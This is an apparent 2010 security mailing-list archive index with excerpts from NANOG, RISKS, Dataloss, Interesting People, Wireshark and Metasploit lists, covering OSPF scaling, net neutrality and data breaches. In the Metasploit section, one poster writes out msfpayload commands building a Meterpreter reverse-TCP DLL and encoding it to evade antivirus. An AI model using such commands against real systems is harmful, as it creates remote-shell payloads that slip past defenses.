Tuesday, September 14, 2010
1 p.m. EDT / Noon CDT / 11 a.m. MDT / 10 a.m. PDT
http://www.incommon.org/
----------

InCommon has launched a new certificate service, providing unlimited
certificates at one low fee. The research and higher education community
developed this service for pragmatic reasons (primarily to reduce costs)
and innovative reasons (the first real step toward signed...

Question about Endpoint Encryption Gregory N Pendergast (Sep 02)
I'm looking for feedback on endpoint encryption solutions - both
products you've used or are using and your experiences. VCU purchased
GuardianEdge some time ago, but we've run into a number of problems that
have delayed our deployment and caused me to lose confidence in the
product, to the point that I'm considering dropping it and looking for a
different solution. The problems we've encountered are generally
post-installation failures...

Re: attempts sending fake phishing messages to students and/or employees Morrow Long (Sep 02)
Thanks. We liked RIT's idea of having a student walk around in a fish
costume and used it for phishing (as well as social networking
security) awareness for frosh orientation (and other personal
appearances):

http://www.yaledailynews.com/news/2010/sep/02/new-its-mascot-hooks-freshmen/

- Morrow

Re: firewall requirements for applications Charles Buchholtz (Sep 01)
Here are some factors that may be involved in decision/policy to
require different levels of firewall for different applications:

Ingress restrictions

1) Do the applications have the same level of design / code review?

2) Do the applications have the same level of change management / review ?

3) Does the operating environment (OS, libraries, configuration) have
the same security model / review?

4) Does the operating environment (OS,...

Re: Symantec Installation Eric C. Lukens (Sep 01)
If you run into the problem on new installations or as part of an
multi-application deployment and you do PROPER TESTING FIRST (did I
stress this enough?), you can also remove the LaunchCondition value from
the MSI that checks this registry key. Remember, Symantec put in that
check for a reason, but you also may have a good reason to avoid it.

Use a program like Orca, InstEd, or if you have money InstallSheild and
open the SEP MSI. Remove this...

Re: firewall requirements for applications Jason Testart (Sep 01)
Another issue is user accountability. Assuming the password is embedded
in the exe, what logging/controls do you have on *who* is accessing the
data? The share at least (hopefully) provides some measure of
user-level access control where the exe file itself likely does not (and
if it does, could be more easily defeated). You need to really
understand what controls are in place on the database itself, because it
is indeed all about the risk.

Re: Symantec Installation Tom Peterson (Sep 01)
Google for this little program, "cleanwipe.exe".

Tom

Director, ITS - User Services
University of Northern Iowa 36 ITTC
Cedar Falls, IA 50614-0522
Phone: 319-273-6460 fax: 319-273-7518
Website: http://www.uni.edu/peterson

Entwistle, Bruce said the following on 9/1/2010 1:49 PM:

Internet Issues and Infrastructure

NANOG — The North American Network Operators' Group discusses fundamental Internet infrastructure issues such as routing, IP address allocation, and containing malicious activity.

Re: largest OSPF core Christian Martin (Sep 02)
The stability of the topology plays a most prominent role, but it wouldn't surprise me if a OSPF network largely
comprised of router LSAs (no redistribution), using today's hardware, could easily scale to 1000 nodes in an area.
Some newer techniques may affect this scale in either direction (ie, subsecond hellos and fast convergence would
negatively impact scale on some platforms, while using demand circuit emulation on p2p links would impact...

Re: largest OSPF core Alex Ryu (Sep 02)
I think it is really depending on how your network topology looks like.
If you have top-down design with star topology to limit the network
connections to individual routers, it may scale well.
But if you connect every routers to each other such as full-mesh, it
will be a problem during interface flapping or something like that.

Alex

Re: largest OSPF core Leo Bicknell (Sep 02)
In a message written on Thu, Sep 02, 2010 at 03:20:05PM +0300, lorddoskias wrote:

I'll admit to having seen a network with over 400 devices in an
OSPF area 0, didn't design it, and in the end didn't get to work
on it.

Far as I know worked just fine though, no issues reported. How
well your IGP scales depends a lot more on what you put in it, and
how dynamic your network situation is than the protocol or number
of devices.

Re: largest OSPF core Valdis . Kletnieks (Sep 02)
On Thu, 02 Sep 2010 14:12:38 EDT, Deepak Jain said:

Well, they were half-right. ;)

RE: largest OSPF core Deepak Jain (Sep 02)
For giggles:

http://books.google.com/books?id=uBwEAAAAMBAJ&pg=PA59&dq=practical+limits+of+OSPF&hl=en&ei=qud_TNTAFYL68AautJXoAQ&sa=X&oi=book_result&ct=result&resnum=2&ved=0CCwQ6AEwAQ#v=onepage&q=practical%20limit&f=false

Network World April 9, 1990 (page 59):

"There is no practical limit to the number of interconnected networks OSPF and Dual Intermediate System-to-Intermediate
System can...

Re: eBGP Multihop Nick Hilliard (Sep 02)
Of course, this sort of thing is usually great fun and seems like a Very
Good Idea At The Time. You get your cool configuration in place with lots
of local hax and the network hums along. Then the developer who wrote the
hax leaves because of something or another. And the person who configured
the box leaves due to management politics, and then the Windows IT support
person takes over, along with the smart person on the front-line tech
support...

Re: eBGP Multihop Hannes Frederic Sowa (Sep 02)
I have not tried yet, but you could have a look at [1]. Perhaps it
could be extended to match your needs.
Do you run an IGP?

Hannes

[1] http://kbfd.sourceforge.net/

Re: largest OSPF core Nick Hilliard (Sep 02)
You don't expect anyone to actually admit to something like this? :-)

Nick

Re: eBGP Multihop Steven King (Sep 02)
The last company I worked for moved to eBGP Multi-Hop where there were
two connections to the same provider (same AS). This allowed them to
utilize both links in both directions vs only one link in one direction
and have failover.

As you have mentioned link state detection gets a bit crazy with this.
If you have a MetroE connection (for example) with multiple segments,
this could be problematic. If your side of the link goes down, then you
stop...

Re: eBGP Multihop Jack Carrozzo (Sep 02)
*magic* that standard router aren't capable of.

This should scare you in a significant manner.

-Jack Carrozzo

Anyone from Trinidad and Tobago TSTT on list? Hal Lightwood (Sep 02)
Please contact me at your convenience.
Thank you

-- Hal A. Lightwood <hal.lightwood () gmail com>
-- Tel: 510 621 3040
-- Skype: hal.lightwood

largest OSPF core lorddoskias (Sep 02)
I'm just curious - what is the largest OSPF core (in terms of number
of routers) out there?

Re: Comcast enables 6to4 relays Joe Maimon (Sep 02)
So the biggest problem with 6to4 relays is that they are not ubiquitous
and/or well run.

Does offering your relays to the world, thereby improving the odds of
off-net traffic returning through them >0, actually offer an improvement
to your own users' experience with 6to4?

Joe

Franck Martin wrote:

eBGP Multihop Graham Beneke (Sep 02)
I have been asked to investigate moving an entire network to multi-hop
on all the eBGP sessions. Basically all upstreams, downstreams and peers
will eBGP with a route reflector located in the core. This RR will be
some kind of quagga or similar box. The dev guys want to be able to poke
at the BGP feeds directly and do *magic* that standard router aren't
capable of.

My gut feel is that this is a bad idea. Besides anything else it makes
sane...

Re: ICMPv6 rate limits breaking PMTUD (and traceroute) [Re: Comcast enables 6to4 relays] Pekka Savola (Sep 01)
...

I've noticed 6to4 relay rate-limiter blackholes before (e.g. in
Your.org relay in AMS, got quickly fixed once I reported it).

FWIW, Linux default is 1000pps and BSD has 100pps which is too low for
a popular relay. In our relays we've used 1000-3000pps.

The majority of ICMPv6's is caused by windows boxes testing the
relay's liveness.

Depending on the MTU configuration of the relay's tunnel interface
(there isn't a BCP on this I...

Interesting People — David Farber moderates this list for discussion involving internet governance, infrastructure, and any other topics he finds fascinating

Hello dear Victoria Goodluck (Aug 15)
Nice to meet you.
My name is miss Victoria.i saw your profile today became intrested in you,i will also like to know more about you,and i
want you to send a mail to my email address so that i can give you my picture for you to know whom l am. .i believe we
can move from here.I am waiting to here from you. above all remeber that distance or colour does not matter but love
matters alot in life.
Please reply me back.yours VICTORIA

FCC Calls Off Net Neutrality Talks Dave Farber (Aug 05)
Begin forwarded message:

> From: Richard Forno <rforno () infowarrior org>
> Date: August 5, 2010 1:27:48 PM PDT
> To: List Infowarrior <infowarrior () attrition org>
> Cc: Farber Dave <dave () farber net>
> Subject: FCC Calls Off Net Neutrality Talks
>

> FCC Calls Off Net Neutrality Talks
>
> http://online.wsj.com/article/SB10001424052748703748904575411632530886558.html?
>
> By AMY SCHATZ...

re eGoogle and Verizon in Talks on Selling Internet Priority - NYTimes.com Dave Farber (Aug 05)
Begin forwarded message:

> From: Andrew C Burnette <acb () acb net>
> Date: August 5, 2010 11:04:02 AM PDT
> To: dave () farber net
> Subject: Re: [IP] Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>

> Dave,
>
> for IP if you wish.
>
> I would guess this could be overlap of timing between the FCC
> discussions and the always ongoing issues of interconnectivity (peering)
> in...

Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet again Dave Farber (Aug 05)
Begin forwarded message:

> From: Mikki Barry <ooblick () ego org>
> Date: August 5, 2010 10:41:33 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: Re: [IP] Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet
> again
>

> You know, Dave, we must not be the only people who have had apple mail losing our email. I have been around and
>...

paper on technology manias and gullibility, of some interest to IP list Dave Farber (Aug 05)
Begin forwarded message:

> From: Andrew Odlyzko <odlyzko () umn edu>
> Date: August 5, 2010 10:11:06 AM PDT
> To: dave () farber net
> Subject: paper on technology manias and gullibility, of some interest to IP list
>

> Dave,
>
> Since the readers of the IP list are discussed in Section 5 of this
> paper, they might like to learn of it directly, so they have a chance
> to react.
>
> Best regards,...

some "facts" Verizon, Too! re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com Dave Farber (Aug 05)
Begin forwarded message:

> From: "Sullivan, Michael" <MSullivan () wbklaw com>
> Date: August 5, 2010 9:07:52 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: RE: [IP] Verizon, Too! re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority -
> NYTimes.com
>

> Both Verizon and Google have specifically said the NY Times article got it all wrong.
>
>...

re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com Dave Farber (Aug 05)
Begin forwarded message:

> From: h_bray () globe com
> Date: August 5, 2010 8:42:21 AM PDT
> To: dave () farber net
> Cc: ip <ip () v2 listbox com>
> Subject: Re: [IP] GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>

> FWIW, Google says the NY Times story is "quite simply wrong."
>
> http://www.pcmag.com/article2/0,2817,2367436,00.asp
>
>
>...

re Google and Verizon in Talks on Selling Internet Priority - NYTimes.com Dave Farber (Aug 05)
Begin forwarded message:

> From: George Ou <George.Ou () digitalsociety org>
> Date: August 5, 2010 8:06:09 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: RE: [IP] Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>

> For IP if you wish.
>
> This story is devoid of facts and self contradictory.
>...

Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet again Dave Farber (Aug 05)
Dave

-------------------------------------------
Archives: https://www.listbox.com/member/archive/247/=now
RSS Feed: https://www.listbox.com/member/archive/rss/247/
Modify Your Subscription: https://www.listbox.com/member/?member_id=18849915&id_secret=18849915-aa268125
Unsubscribe Now: https://www.listbox.com/unsubscribe/?member_id=18849915&id_secret=18849915-32545cb4
Powered by Listbox: http://www.listbox.com

Google and Verizon in Talks on Selling Internet Priority - NYTimes.com Dave Farber (Aug 05)
http://www.nytimes.com/2010/08/05/technology/05secret.html?_r=1

For a change -- I will not say " I told you so". Djf

-------------------------------------------
Archives: https://www.listbox.com/member/archive/247/=now
RSS Feed: https://www.listbox.com/member/archive/rss/247/
Modify Your Subscription: https://www.listbox.com/member/?member_id=18849915&id_secret=18849915-aa268125
Unsubscribe Now:...

Google, Verizon, the FCC and Net Neutrality Dave Farber (Aug 04)
Begin forwarded message:

> From: Gene Gaines <gene.gaines () gainesgroup com>
> Date: August 4, 2010 9:33:59 PM PDT
> To: David Farber <dave () farber net>
> Subject: Google, Verizon, the FCC and Net Neutrality
>

> Two views of a stunningly important issue
>
> FIRST: From the New York Times, Aug 4, 2010:
>
> Google and Verizon in Talks on Selling Internet Priority
>
> WASHINGTON — Google and...

Outsourcing We Can Believe In Dave Farber (Aug 04)
Begin forwarded message:

> From: Randall Webmail <rvh40 () insightbb com>
> Date: August 4, 2010 2:28:51 PM PDT
> To: johnmacsgroup () yahoogroups com, dewayne () warpspeed com, dave () farber net
> Subject: Outsourcing We Can Believe In
>

> U.S. To Train 3,000 Offshore IT Workers
>
> $22 million, federally-backed program aims to help outsourcers in South Asia become more fluent in areas like Java
>...

Book review: Skating on Stilts - WSJ.com Dave Farber (Aug 04)
http://online.wsj.com/article/SB10001424052748703545604575407380884722858.html

-------------------------------------------
Archives: https://www.listbox.com/member/archive/247/=now
RSS Feed: https://www.listbox.com/member/archive/rss/247/
Modify Your Subscription: https://www.listbox.com/member/?member_id=18849915&id_secret=18849915-aa268125
Unsubscribe Now:...

So they lied. This is surprising why? Dave Farber (Aug 04)
Begin forwarded message:

> From: Randall Webmail <rvh40 () insightbb com>
> Date: August 4, 2010 8:36:43 AM PDT
> To: johnmacsgroup () yahoogroups com, dewayne () warpspeed com, dave () farber net
> Subject: So they lied. This is surprising why?
>

> "For the last few years, federal agencies have defended body scanning by insisting that all images will be discarded
> as soon as they're viewed. The...

YUM YUM Dave Farber (Aug 03)
That is Jakes in Portland Oregan

Begin forwarded message:

> From: Dave Farber <dave () farber net>
> Date: August 3, 2010 4:41:04 PM PDT
> To: ip <ip () v2 listbox com>
> Subject: [IP] YUM YUM
> Reply-To: dave () farber net
>

> I am sitting at Jakes having finished a bowl of Manhatten clam chowder.
>
> Wonderful
>
>
> -------------------------------------------
> Archives:...

The RISKS Forum — Peter G. Neumann moderates this regular digest of current events which demonstrate risks to the public in computers and related systems. Security risks are often discussed.

Risks Digest 26.14 RISKS List Owner (Aug 30)
RISKS-LIST: Risks-Forum Digest Monday 30 August 2010 Volume 26 : Issue 14

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.14.html>
The current issue can be...

Risks Digest 26.13 RISKS List Owner (Aug 02)
RISKS-LIST: Risks-Forum Digest Monday 2 August 2010 Volume 26 : Issue 13

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.13.html>
The current issue can be...

Risks Digest 26.12 RISKS List Owner (Jul 30)
RISKS-LIST: Risks-Forum Digest Friday 30 July 2010 Volume 26 : Issue 12

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.12.html>
The current issue can be...

Risks Digest 26.11 RISKS List Owner (Jul 21)
RISKS-LIST: Risks-Forum Digest Wednesday 21 July 2010 Volume 26 : Issue 11

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.11.html>
The current issue can be...

Risks Digest 26.10 RISKS List Owner (Jul 10)
RISKS-LIST: Risks-Forum Digest Saturday 10 July 2010 Volume 26 : Issue 10

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.10.html>
The current issue can be...

Risks Digest 26.09 RISKS List Owner (Jul 03)
RISKS-LIST: Risks-Forum Digest Saturday 3 July 2010 Volume 26 : Issue 09

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.09.html>
The current issue can be...

Risks Digest 26.08 RISKS List Owner (Jun 10)
RISKS-LIST: Risks-Forum Digest Thursday 10 June 2010 Volume 26 : Issue 08

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.08.html>
The current issue can be...

Risks Digest 26.07 RISKS List Owner (May 29)
RISKS-LIST: Risks-Forum Digest Saturday 29 May 2010 Volume 26 : Issue 07

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.07.html>
The current issue can be...

Risks Digest 26.06 RISKS List Owner (May 08)
RISKS-LIST: Risks-Forum Digest Saturday 8 May 2010 Volume 26 : Issue 06

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.06.html>
The current issue can be...

Risks Digest 26.05 RISKS List Owner (May 04)
RISKS-LIST: Risks-Forum Digest Tuesday 4 April 2010 Volume 26 : Issue 05

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.05.html>
The current issue can be...

Risks Digest 26.04 RISKS List Owner (Apr 28)
RISKS-LIST: Risks-Forum Digest Wednesday 28 April 2010 Volume 26 : Issue 04

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.04.html>
The current issue can be...

Risks Digest 26.03 RISKS List Owner (Apr 25)
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.03.html>
The current issue can be found at
<http://www.csl.sri.com/users/risko/risks.txt>

Contents:...

Risks Digest 26.02 RISKS List Owner (Apr 18)
RISKS-LIST: Risks-Forum Digest Sunday 18 April 2010 Volume 26 : Issue 02

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.02.html>
The current issue can be...

Risks Digest 26.01 RISKS List Owner (Apr 08)
RISKS-LIST: Risks-Forum Digest Thursday 8 April 2010 Volume 26 : Issue 01

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.01.html>
The current issue can be...

Data Loss — Data Loss covers large-scale personal data loss and theft incidents. This archive combines the main list (news releases) and the discussion list.

Wow, pardon that last subject line.. security curmudgeon (Sep 01)
A bad cut and paste doesn't begin to explain the out of context IM snippet
that ended up as the subject. Apologies =)

Heartland settles with Discover over breach security curmudgeon (Sep 01)
http://www.scmagazineus.com/heartland-settles-with-discover-over-breach/article/178116/

Heartland settles with Discover over breach
Dan Kaplan
September 01, 2010

Heartland Payment Systems, the New Jersey-based credit card processor that
fell victim to the largest reported data breach of all time, announced on
Wednesday that it will settle with Discover for $5 million. Heartland
already has settled with Visa for $60 million and MasterCard...

State retiree data breached security curmudgeon (Sep 01)
---------- Forwarded message ----------
From: InfoSec News <alerts () infosecnews org>

http://www.delawareonline.com/article/20100831/NEWS02/8310324/State+retiree+data+breached

By J.L. MILLER
The News Journal
August 31, 2010

DOVER -- In a data breach that one security expert said could be worth
millions of dollars to scam artists, Aon Consulting, the state's benefits
consultant, inadvertently posted personal information of about 22,000...

Privacy commissioner orders shutdown of BCLC online gambling site until glitches can be fixed security curmudgeon (Aug 31)
http://www.theprovince.com/technology/Privacy+commissioner+orders+shutdown+BCLC+online+gambling+site+until+glitches+fixed/3329791/story.html

Privacy commissioner orders shutdown of BCLC online gambling site until
glitches can be fixed

By Andy Ivens
The Province July 28, 2010

Provincial privacy commissioner Elizabeth Denham has ordered the
government.s online gambling website to remain shut down until the B.C.
Lottery Corp. can find out what...

State employee retirees' Social Security numbers posted on website by vendor kirniki (Aug 30)
http://www.newarkpostonline.com/articles/2010/08/30/news/doc4c7bc3beab609126028198.txt

State of Delaware consultant, Aon Consulting is mailing letters to
approximately 22,000 State of Delaware retirees, after the company
included Social Security Numbers, gender information and dates of
birth in a Request for Proposal (RFP) the company prepared for the
state.
[..]

Re: [Dataloss] E-mail Causes Most EnterpriseData Loss Al (Aug 30)

There are many kinds of breaches. What we see via Dataloss is a sub-set of
the whole.

Dataloss seems more concerned with those that involve significant volume of
individual people's private data, not leakage of confidential corporate data
through social media. But the fact remains that many breaches occur because
some employee sends via e-mail an attachment listing info on many customers,
including bank account info. It is human error. It...

Re: [Dataloss] Study: About One-Fifth ofBreached Entities Were PCI-Compliant Al (Aug 30)
Thanks for corrections to my understandings.
It is evident that we are talking about multiple reports and data sets, from
which different conclusions may be drawn.

I have not looked at ALL the Verizon reports, but I think it was last year
they said that PCI was NOT the purpose of the report, it was to analyze how
the places got breached, which they had insider data on. The PCI
perspective there was kind of an after-thought, because of high...

Re: [Dataloss] E-mail Causes Most Enterprise Data Loss Uzi Yair (Aug 30)
This report is a waist of valuable reading time but an attempt of a
vendor to promote email security.
There are 65,535 ports and they are saying the email causes most data
loss. I have been monitoring this group for a long while. I do not
recall the last time there was an event from an email violation.
If indeed corporation were monitoring all 65,535 ports, then I would be
less skeptical.

Regards,

*Uzi Yair*| uyair <mailto:uyair ()...

Re: [Dataloss] Study: About One-Fifth ofBreached Entities Were PCI-Compliant Alex Hutton (Aug 30)
Discussion inline.

Hi Al

I'm somewhat familiar with them.

which come out at least annually,

I think you're confused as to the nature of the data set. Many/most
of our IR clients are not otherwise Verizon Cybertrust services
customers. In addition, this year's report includes 3 years of USSS
data. As such, there is very little information such a statistic
would offer, really.

Actually, we do. The data set now includes 3 years of USSS...

Re: [Dataloss] Study: About One-Fifth ofBreached Entities Were PCI-Compliant Al (Aug 30)
If you read the actual Verizon reports, which come out at least annually,
Verizon is in the business of serving the needs of their customer clients.
We do not have a directory of their customers, other than inference from
someone whose e-mail address has the word "verizon" in there.
They do not reveal statistics like "We have X million customers of which X
thousand were knowingly breached."
They will not reveal any info that...

Re: [Dataloss] Study: About One-Fifth of Breached Entities Were PCI-Compliant Alex Hutton (Aug 30)
FWIW neither of these are "surveys".

Sent from my iPad

E-mail Causes Most Enterprise Data Loss security curmudgeon (Aug 30)
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=227101707&subSection=News

E-mail Causes Most Enterprise Data Loss

Breaches associated with social media, video sharing, blogs are also on
the rise, finds Proofpoint study.

By Alison Diana
InformationWeek
August 30, 2010 11:07 AM

Although e-mail continues to be the primary source of data-loss risk at
enterprises, the number of data-loss events...

follow-up: Alleged Carder .BadB. Charged in $9 Million ATM Heist security curmudgeon (Aug 30)
http://www.wired.com/threatlevel/2010/08/badb-rbs-worldpay-hack/

Alleged Carder .BadB. Charged in $9 Million ATM Heist
By Kim Zetter
August 30, 2010

An alleged carder arrested earlier this month in France has been added to
a long list of defendants charged with participating in the coordinated
$9.5 million global heist against Atlanta-based card processing company
RBS WorldPay, in a revised federal indictment issued in Georgia last week....

Lost or stolen: dozens of NHS and council computers with personal data Jake Kouns (Aug 29)
http://news.stv.tv/scotland/194476-lost-or-stolen-dozens-of-computers-with-personal-data/

Scores of computers, USB sticks and mobile phones were lost by
Scotland's public bodies in just a few months - including many
containing unencrypted personal information.

The figures, released on Sunday, reveal that one council - the West
Lothian authority - had 20 laptops stolen between February and July
this year.

A laptop stolen from one health board,...

Bad flash drive caused worst U.S. military breach Jake Kouns (Aug 29)
http://news.cnet.com/8301-27080_3-20014732-245.htm

A malware-laden flash drive inserted in a laptop at a U.S. military
base in the Middle East in 2008 led to the "most significant breach
of" the nation's military computers ever, according to a new magazine
article by a top defense official.
The malware uploaded itself to the U.S. Central Command network and
spread undetected on classified and unclassified computers creating a...

Open Source Tool Development

Metasploit — Development discussion for Metasploit, the premier open source remote exploitation tool

Re: Dynamically Generated Final Stages egypt (Sep 02)
If I understand you correctly, you can look at passivex for an example
of what you want. Basically you need to tell the framework that the
final stage is not transmitted over the stager connection as with
normal stagers. Then call generate_stage to get the final payload.

Hope this helped,
egypt

Re: Dynamically Generated Final Stages tyronmiller (Sep 02)
Hey Philip,

Thanks for sending through the new link, as well as your response. I have
gone through the code and I don't think this was what I was after.
Appreciated anyway.

Let me see if I can be clearer in what I am after:

I have added my payload module called "awesome_payload" to my msf
installation. In msfconsole, when I type "search awesome_payload" I get the
following:

windows/dllinject/awesome_payload...

Re: middle stage listener and threads Ty Miller (Sep 01)
Hey guys,

Noone had any threads/shellcode experience?

Threads look like they would be cleaner on Windows; however, SK pointed me
to his phrack article talking about how to do Windows forking (
http://www.phrack.org/issues.html?id=7&issue=62). This refers to an article
by LSD which doesn't seem to be there anymore (
http://lsd-pl.net/windows_components.html) ... If anyone has this article,
then can you pass it on or point me in the right...

problem metasploit on iphone 3G robert (Sep 01)
hello guys,

I have problem with "show exploits" on my iphone!
The another show payloads works good en show nops works good, only problem with show exploits!
What's the problem?

msf > show exploits
[-] Error while running command show: uninitialized constant Msf::Encoder::Type::SingleStaticBit

Call stack:
/usr/share/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:431:in `load_missing_constant'...

nullcon Goa dwitiya (2.0) Call For Papers nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference

nullcon is an initiative by null - The open security community.

Website:
http://nullcon.net

Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.

Tracks:
---------------
- Bakkar: 1 Hr Talks
-...

Re: Fwd: return values from railgun Rob Fuller (Sep 01)
I forgot about the strict RFC compliance on this list and only replied to
you Josh, here is my reply since you referenced it:

// It really depends on the call you make and what the API call returns,
attempt your call, attaching it to a variable and see what it spits out.

Re: return values from railgun Carlos Perez (Sep 01)
Here are the results of all message box types, just look for the returned hash de key of return and read the returned
value

creturn_val = client.railgun.user32.MessageBoxA(0,"Hello","world","MB_OKCANCEL")
=> {"GetLastError"=>0, "return"=>2}

=> 2

=> Fixnum

Values for all messagebox types:

# Abort

=> {"GetLastError"=>0, "return"=>3}
# Retry

=>...

Re: Fwd: return values from railgun lazydj98 (Sep 01)
Sorry for the apparently blank message everyone
I had intended to say, if you're checking for success, I had asked a
similar question a few weeks ago, but not specific to railgun, and the
answer was, success if not exception thrown. However railgun might be
different since I'm guessing you're looking for the return codes from the
actual windows functions that get called? Either way, try what Mubix said,
altho you should be able to look...

Re: DLL name for webdav_dll_hijacker exploit anil saini (Aug 31)
I have made a dll using *"./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.1 LPORT=5050 D > /temp/rpawinet.dll"* . The dll is working
and giving me meterpreter shell.

But this dll is caught by almost all anti-virus. I tried encoded this using
./msfencode but then this stoped working.
i used "*./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1
LPORT=4433 R | ./msfencode -c 13 -e x86/shikata_ga_nai - t...

Re: Dynamically Generated Final Stages Ty Miller (Aug 31)
thanks. I'll take a look and will let ya know.

Thx,
Ty

Fwd: return values from railgun Joshua Smith (Aug 31)

return values from railgun max (Aug 31)
Hi there list, i tried to use railgun in a meterpreter script. Works
fine so far for opening a msgboxa but how do i get the return values
back from the api calls?

greetings

max

Re: Host Analysis exibar (Aug 31)
Although not open source, Mandiant has a couple offerings that will do
what you want. They also have quite a few free tools that will also
perform these functions.
check them out, you'll be happy :-)

Exibar

Quoting Abhijeet Hatekar <abhi.hatekar () gmail com>:

Re: Host Analysis Abhijeet Hatekar (Aug 31)
I would like to do complete remote system analysis by scanning registry,
services, processes, handles, network ports, shadow copies, open files, live
memory details etc and look for potential threats like Viruses, Malwares,
Rootkits.

GMER, ICESword, Autoruns can be used for most of these things but i would
like to know if there is a single tool available for doing all such things.
Responder is one such tool, however i am looking for...

Re: Shodan search in MSF? John H. Sawyer (Aug 31)
I'm on my way there. Here's what I wrote last night. It's not a
module yet, but it's a start to interacting with the SHODAN API
using Ruby and JSON.

http://sploitlab.wordpress.com/

-jhs

Wireshark — Discussion of the free and open source Wireshark network sniffer. No other sniffer (commercial or otherwise) comes close. This archive combines the Wireshark announcement, users, and developers mailing lists.

buildbot failure in Wireshark (development) on OSX-10.5-PowerPC buildbot-no-reply (Sep 02)
The Buildbot has detected a new failure of OSX-10.5-PowerPC on Wireshark (development).
Full details are available at:
http://buildbot.wireshark.org/trunk/builders/OSX-10.5-PowerPC/builds/955

Buildbot URL: http://buildbot.wireshark.org/trunk/

Buildslave for this Build: osx-10.5-ppc

Build Reason:
Build Source Stamp: 34043
Blamelist: etxrab

BUILD FAILED: failed failed slave lost

sincerely,
-The Buildbot

